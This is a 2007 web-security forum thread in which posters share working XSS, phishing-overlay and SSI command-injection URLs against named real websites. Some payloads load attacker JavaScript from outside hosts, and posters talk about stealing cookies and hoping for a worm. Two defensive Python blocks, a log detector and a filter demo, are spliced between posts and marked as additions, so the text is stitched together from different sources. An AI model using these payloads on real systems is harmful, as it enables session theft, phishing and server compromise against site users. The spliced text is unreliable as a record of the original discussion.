sla.ckers.org is ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails.
Re: So it begins
Posted by: WhiteAcid
Date: January 04, 2007 07:14PM

Quote:
> although they may have popped up on the server?
No, that simply wouldn't happen, the server has no clue where to even start parsing a file.
I'm glad you have fixed the issue.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: eyeced
Date: January 06, 2007 08:45AM

http://www.tiscali.co.uk/search/results.php?section=&from=&query=%3C%2Fb%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E

This is some strange XSS: the alert box pops up but with nothing in it. If you check the source code you can see that in all places apart from one the < > are converted to lt & gt, yet they've left one place open. Anyway, for those of you who aren't English, this is quite a major ISP.

http://search-dyn.tiscali.de/search.php?key=%3C%2Fb%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E&collection=de&collapse=on&language=de&hits=10&tiscalitype=web&pg=1&offset=0&external=1&spell=suggest

Its German counterpart.



Edited 1 time(s). Last edit at 01/06/2007 08:47AM by eyeced.

Re: So it begins
Posted by: kirke
Date: January 06, 2007 01:59PM

get your second side inside SecondLife ...

https://secure-web6.secondlife.com/account/login.php?type=second-life-member&nextpage=/42%22%3E%3Ciframe%20src=%22http://ha.ckers.org/images/stallowned.jpg%22%20width=300%20height=%22500

This site has countless XSS holes, prints the password in the returned form if you passed something wrong, returns server errors when fed unexpected data, etc. etc.
A Showcase for your Imagination (to use their words ;-)
I guess it's worth opening its own thread here, if someone digs deeper ...



Edited 1 time(s). Last edit at 01/06/2007 02:01PM by kirke.

Re: So it begins
Posted by: jungsonn
Date: January 07, 2007 01:25PM

This is really the weirdest XSS I've seen. It uses a part of the search result and alert('ok') *_*

http://www.excite.co.uk/search/web/results/?qs=2066&q=%22%3E%3C%22%3E%3Cscript%3E%3Cscript%3Ealert&c=

Re: So it begins
Posted by: jungsonn
Date: January 07, 2007 01:43PM

OK, no XSS, but who needs it? I just put a layer on top of AltaVista:

http://uk.altavista.com/audio/results?itag=ody&q=%22%3E%3C%2Ftitle%3E%3Cdiv+style%3D%22position%3Aabsolute%3Bwidth%3A600%3Btop%3A100%3Bleft%3A300%3Bheight%3A400px%3Bz-index%3A10%3B+padding%3A5px%3B+background-color%3Ared%3Bopacity%3A.50%3Bfilter%3Aalpha%28opacity%3D50%29%3B-moz-opacity%3A0.5%3Bborder%3A1px+solid+black%3Bfont-family%3Averdana%3Bcolor%3Ablack%3B+text-align%3Acenter%3B%22%3E%0D%0A%3Ch1%3E+haxored%21%3C%2Fh1%3E%0D%0A%3Ch1%3E+haxored%21%3C%2Fh1%3E%0D%0A%3Ch1%3E+haxored%21%3C%2Fh1%3E%0D%0A%3Ch1%3E+haxored%21%3C%2Fh1%3E%0D%0A%3Ch1%3E+haxored%21%3C%2Fh1%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%3Ctitle%3E&maf=mp3&maf=wav&maf=msmedia&maf=realmedia&maf=aiff&maf=other&mad=all

Re: So it begins
Posted by: jungsonn
Date: January 07, 2007 02:00PM

Or we could take a day off to phish:

http://uk.altavista.com/audio/results?itag=ody&q=%22%3E%3C%2Ftitle%3E%3Cdiv+style%3D%22position%3Aabsolute%3Bwidth%3A800px%3Btop%3A100%3Bleft%3A200%3Bheight%3A500px%3Bz-index%3A10%3B+padding%3A5px%3B+background-color%3Ared%3Bborder%3A1px+solid+black%3Bfont-family%3Averdana%3Bcolor%3Ablack%3Btext-align%3Acenter%3B%22%3E%0D%0A%3Ch1%3E+Give+me+your+creditcard+number+so+we+can+buy+stuff%21%3C%2Fh1%3E%0D%0A%3Cbr%3E%3Cbr%3E%0D%0A%3Cform+name%3D%22bla%22+action%3D%22bla.php%22+method%3D%22post%22%3E%3Cbr%3E%0D%0AName%3A%3Cbr%3E%0D%0A%3Cinput+type%3D%22text%22+size%3D%2250%22%3E%3Cbr%3E%0D%0AAdres%3A%3Cbr%3E%0D%0A%3Cinput+type%3D%22text%22+size%3D%2250%22%3E%3Cbr%3E%0D%0ACreditcard+number%3A%3Cbr%3E%0D%0A%3Cinput+type%3D%22text%22+size%3D%2250%22%3E%3Cbr%3E%0D%0A%3Cbr%3E%0D%0A%3Cinput+type%3D%22submit%22+name%3D%22submit%22+style%3D%22width%3A200px%3Bheight%3A100px%3Bsize%3A24%3B%22+value%3D%22SEND%21%22%3E%0D%0A%3C%2Fform%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%3Ctitle%3E&maf=mp3&maf=wav&maf=msmedia&maf=realmedia&maf=aiff&maf=other&mad=all

Good stuff.

Re: So it begins
Posted by: kirke
Date: January 07, 2007 02:59PM

jungsonn, why a layer?
Does an iframe not work?

Re: So it begins
Posted by: jungsonn
Date: January 07, 2007 03:13PM

Sure, it would work, but only if it were placed just under the <title> where the flaw is. A div layer is quickly positioned.

Re: So it begins
Posted by: SystemOfAHack
Date: January 07, 2007 05:45PM

MySpace...

http://myspace.com/Modules/Search/Pages/Search.aspx?fuseaction=advancedFind.results&t=');alert('XSS%20kthxbye

Re: So it begins
Posted by: digi7al64
Date: January 07, 2007 06:04PM

@SystemOfAHack

Nice find - cross-browser XSS vuln in MySpace. Hopefully we can see some type of worm come out of it.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: SystemOfAHack
Date: January 07, 2007 06:32PM

Hah thx, I tested it with a few willing victims and it steals cookies nicely. Don't know about a worm. I tried embedding a getURL() in an SWF but I think a recent update means not even allowNetworking=internal works...

Re: So it begins
Posted by: rsnake
Date: January 09, 2007 12:05PM

Very nice find, SystemOfAHack!

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: SystemOfAHack
Date: January 09, 2007 02:43PM

[Kthx again.] I don't know if this belongs here [as the thread seems based on XSS (>html)] but here's another thing I found a long time ago... I never really mentioned it until the other day and don't want someone else taking credit... :p

http://images.com/SwishSearch?whichindex=&Keywords=%3C%21--%23exec+cmd%3D%22ls%22--%3E&max_res=25&searchinclude=illustration&searchinclude=photography&searchinclude=rp&searchinclude=rf&color=color&color=gray&searchinclude=vertical&searchinclude=horizontal

SHTML; nasty one, that... half the crap after the (GET) injection part probably isn't necessary but there you are anyway. I suppose you can then use <!--#include--> or cmd="cat" from there, amongst certain others... :D

Re: So it begins
Posted by: kirke
Date: January 09, 2007 03:02PM

SSI injection, rarely found in modern web sites, nice finding :-)

Re: So it begins
Posted by: rsnake
Date: January 09, 2007 04:47PM

Wow, that's amazing, SystemOfAHack. That is literally the very first example of SSI injection I've ever seen outside of a lab environment, ever. Amazing!

- RSnake
Gotta love it. http://ha.ckers.org

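A defender's view of the SSI injection SystemOfAHack reports above and kirke and rsnake comment on: detection logic that URL-decodes request targets from web access-log lines and flags Apache mod_include directives in user-supplied input. This is an added example, not code from the thread or from any site named in it; the log lines are constructed and the function names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic). The first query
# mirrors the <!--#exec cmd="ls"--> shape quoted in the post; the others are
# a benign search, a second (harmless but still suspicious) SSI directive,
# and a plain page hit.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Jan/2007:15:02:11 +0000] "GET /SwishSearch?Keywords=%3C%21--%23exec+cmd%3D%22ls%22--%3E&max_res=25 HTTP/1.1" 200 5120
203.0.113.6 - - [09/Jan/2007:15:02:12 +0000] "GET /SwishSearch?Keywords=sunset+photography&max_res=25 HTTP/1.1" 200 8210
203.0.113.7 - - [09/Jan/2007:15:03:40 +0000] "GET /SwishSearch?Keywords=%3C%21--%23echo+var%3D%22DATE_LOCAL%22--%3E HTTP/1.1" 200 4000
203.0.113.8 - - [09/Jan/2007:15:04:01 +0000] "GET /about.shtml HTTP/1.1" 200 1200
"""

# Common-log-format prefix: client IP, then "METHOD target PROTOCOL".
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')

# Apache mod_include directive names. Any of them inside user-supplied input
# is a probe or an injection attempt, whether or not that directive is harmful.
SSI_DIRECTIVE = re.compile(
    r"<!--\s*#\s*(config|echo|exec|fsize|flastmod|include|printenv|set)\b",
    re.IGNORECASE,
)

def decode_fully(target: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded directives are not missed."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target

def find_ssi_attempts(log_text: str) -> list[tuple[str, str]]:
    """Return (client_ip, directive) for every request whose decoded
    target carries an SSI directive."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        ip, _method, target = m.groups()
        d = SSI_DIRECTIVE.search(decode_fully(target))
        if d:
            hits.append((ip, d.group(1).lower()))
    return hits

if __name__ == "__main__":
    for ip, directive in find_ssi_attempts(SAMPLE_LOG):
        print(f"{ip} sent an SSI '{directive}' directive")
```

The real fix on the server side is to stop passing user input into an SSI-parsed page (or to disable exec with `Options IncludesNOEXEC`); the detector only tells you who is probing for it.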
Re: So it begins
Posted by: SystemOfAHack
Date: January 09, 2007 08:57PM

Meh, just a simple little one this time. Pulled a random page from Google to see what I could come up with. Disabled a JS redirect to find:

http://jobs.collegegrad.com/JS/Content/KeepLooking.asp?i1=%22%22%3E%3Cscript%3Ealert('xss');%3C/script%3E%3Cplaintext

A terribly unfiltering ASP (from what I can tell, it filters nothing). Got annoyed with the redirect so I plaintext'd the HTML... I'll try to come up with something better in the morning. *yawn*
I heard there was an XSS in Gmail, so I'm on the hunt for that. But they seem to have themselves well covered...

Re: So it begins
Posted by: Lockdown
Date: January 09, 2007 11:53PM

lolz.. some quickies:

http://uploading.com/search.php?q=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Flockdown.nearfreehosting.com%2Fxss.js%3E%3C%2Fscript%3E+&go.x=0&go.y=0&go=1
http://dictionary.law.com/default2.asp?typed=%22%3E%3Cscript%3Ealert%28%27hai%27%29%3B%3C%2Fscript%3E&type=1&submit1.x=0&submit1.y=0&submit1=Look+up
https://secure.mytemplatestorage.com/join.php?fname=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cspanlt2.asp?typed=%22%3E%3Cscript%3Ealert%28%27hai%27%29%3B%3C%2Fscript%3E&type=1&submit1.x=0&submit1.y=0&submit1=Look+up
http://www.ebgames.com/search.asp?Ntk=TitleKeyword&Ntx=mode%2Bmatchallpartial&Ntt=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&N=0&find.x=0&find.y=0&find=Search

oo oo oo one more!

http://onelook.com/?w=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3Eadlkfj&ls=a



Edited 3 time(s). Last edit at 01/10/2007 07:16PM by Lockdown.

Re: So it begins
Posted by: SystemOfAHack
Date: January 10, 2007 01:33PM

Haha, seems that images.com is down. Either someone's very irresponsible or images.com just so happened to realise they had an SSI injection right around the time I posted about it... hmm; I guess I should have just kept it private.

#edt - OK, since I posted that SSI vuln images.com hasn't been accessible, but www.images.com is. Did I post it wrong in the first place or something?... If so, I was tired.



Edited 1 time(s). Last edit at 01/11/2007 06:58PM by SystemOfAHack.

Re: So it begins
Posted by: Luny
Date: January 10, 2007 01:44PM

No URL for this one.

Adultspace.com seems to have now at least tried to filter user input a little this time. <script> gets completely removed but if you put in <s\0cr\0ipt> it gets filtered to <script> and it'll execute.

There's probably a few other ways to bypass it as well.

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com

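The ordering bug Luny describes (remove `<script>` first, drop NUL bytes afterwards) reconstructed beside a corrected filter, as an added example that is not code from the post or from the site in question. Function names and the sample strings are constructed for the demo; the real filter's code is not on the page, so `naive_filter` is a hypothetical reconstruction of the behaviour described.

```python
import html
import re

# Constructed sample inputs (not taken from any real site).
PLAIN = "<script>alert(1)</script>"
NULL_SPLIT = "<s\0cr\0ipt>alert(1)</script>"  # the <s\0cr\0ipt> trick quoted in the post

def naive_filter(value: str) -> str:
    """Hypothetical reconstruction of the described bug: the blacklist runs
    first, then NUL bytes are dropped, so the pieces of '<script>' are
    reassembled only after the check has already passed."""
    value = re.sub(r"<script>", "", value, flags=re.IGNORECASE)
    return value.replace("\0", "")

def hardened_filter(value: str) -> str:
    """Defensive version: canonicalise (drop NUL bytes) before any check,
    then encode for the HTML text context instead of blacklisting tags."""
    value = value.replace("\0", "")
    return html.escape(value, quote=True)

def executes_script(rendered: str) -> bool:
    """Crude oracle for the demo: does a raw opening <script tag survive?"""
    return re.search(r"<script\b", rendered, re.IGNORECASE) is not None

if __name__ == "__main__":
    print("naive, plain:     ", executes_script(naive_filter(PLAIN)))       # False
    print("naive, NUL-split: ", executes_script(naive_filter(NULL_SPLIT)))  # True
    print("hardened, NUL-split:", executes_script(hardened_filter(NULL_SPLIT)))  # False
```

The general lesson is that any blacklist must run on the fully canonicalised value, and that context-aware output encoding removes the need to guess every spelling of a tag.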
Re: So it begins
Posted by: malorn
Date: January 10, 2007 10:20PM

Luny Wrote:
-------------------------------------------------------
> No URL for this one.
>
> Adultspace.com seems to have now at least tried to
> filter user input a little this time. <script> gets
> completely removed but if you put in <s\0cr\0ipt> it gets
> filtered to <script> and it'll execute.
>
> There's probably a few other ways to bypass it as
> well.

Why no URL? Didn't manage to find an XSS within the first few secs but I did find a SQL injection problem and it seems pretty nasty ;)



Edited 1 time(s). Last edit at 01/10/2007 10:22PM by malorn.

Re: So it begins
Posted by: Luny
Date: January 11, 2007 02:18PM

malorn Wrote:

> Why no URL? Didn't manage to find an XSS within the
> first few secs but I did find a SQL injection
> problem and it seems pretty nasty ;)


Eh, I was tired :P
I think I found that nasty SQL injection problem you mentioned tho.

Here's an XSS link tho for em

www.adultspace.com/index.php?action=search&type=&user_sex=Female&user_dating=&user_smoke=&user_drink=&country_id=0&user_job=&user_religion=&display=&radius=&user_zip=&user_email=&user_orientation=">">">">"><BR><BR><BR><BR><img%20src=lol.jpg><"<"<"<"&">">">">"><<IMG%20"""><SCRIPT>alert("XSS")</SCRIPT>

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com

Re: So it begins
Posted by: Luny
Date: January 11, 2007 03:24PM

Here's another
http://www.nwom.net/topsites/index.php?o=<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>

Input forms for comments are vulnerable too ^^.

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com

Re: So it begins
Posted by: unsticky
Date: January 11, 2007 06:06PM

http://www.tagdeaf.com/browse.php?update=ok&sub_section=&job=&smoke=&drink=&religion=&sex=&dating=&body_type=&gender=&location=&display=&afrom=&ato=&stringType=user&string=%22%3E%3Cimg%20src=a%20onerror=alert(/xss/);%3E

Re: So it begins
Posted by: Luny
Date: January 11, 2007 06:11PM

Started playing this browser-based MMORPG yesterday:

http://phantasyrpg.com/search.php?search=<script>alert(document.cookie)</script>

I told one of the coders about one regarding sending in-game mail to players that discloses cookie info from an XSS too. He fixed that one pretty quick.

I kinda like this game so I think I'll be good :P

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com

Re: So it begins
Posted by: Lockdown
Date: January 11, 2007 11:42PM

Eh Oh El

http://prints.deviantart.com/?catpath=photography&order=9&q=%22%3E%3Cscript+src%3D//ha.ckers.org/s.js?%3E%3C%2Fscript%3E+

In the store too.. hella phishing opportunities and shnap.

Re: So it begins
Posted by: Hong
Date: January 12, 2007 01:47AM

http://www.google.com/support/pack/?hl=en&gl=hk%27%29;alert%28String.fromCharCode%2888,83,83%29%29;//

Obscure XSS, click the Google Pack logo.

P.S. I am glad that I can connect here with normal speed again.

- Hong

Re: So it begins
Posted by: maluc
Date: January 12, 2007 01:59AM

Since I don't really think MySpace deserves a 7th thread (plus it's unrelated to filter evasion), it's going back here..

This requires SE as they have to click the 'Click Here' button.. I went ahead and added a convincing sentence that can be combined with a worm PM'ing people about free Premier MySpace accounts if they go there and change the address to their own..

http://collect.myspace.com/index.cfm?page=MyspaceVideoSweepstakes&fuseaction=misc.contactConfirm&emailAddress=jjhendrix@gmail.com%20to%20confirm%20your%20free%20Premium%20MySpace%20account.%20A%20passcode%20will%20be%20included%20redeem%20your%20winning%20account.&collectAdditionalInfo=false&numberPagesBack=0);alert(document.cookie);//&contactOrigin=1&isInappropriateContentMsg=0&inappropriateContentLink=&Mytoken=C1A6DCFE-D3BB-434E-96524CC585408C0F27833414

Creativity is all that's still required..

-maluc

Re: So it begins
Posted by: maluc
Date: January 12, 2007 02:01AM

Impressive as usual, Hong.. good work.

-maluc

Re: So it begins
Posted by: maluc
Date: January 12, 2007 02:10AM

From Luny's disclosure under Redirect's Edition:

http://www.webmd.com/click2.asp?redirect=javascript:alert('XSS')

It's a meta redirect.

-maluc

Re: So it begins
Posted by: jungsonn
Date: January 12, 2007 02:26AM

@hong

Wow, just wow.. as they say; legends may sleep, but they never die()

:D
